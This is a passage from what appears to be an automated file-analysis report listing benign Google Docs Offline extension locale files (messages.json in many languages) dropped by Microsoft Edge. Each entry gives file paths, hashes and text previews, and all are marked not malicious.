                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1244
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3107
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1389
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1763
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):930
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):913
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):806
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):883
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1613
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):848
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                Encrypted:false
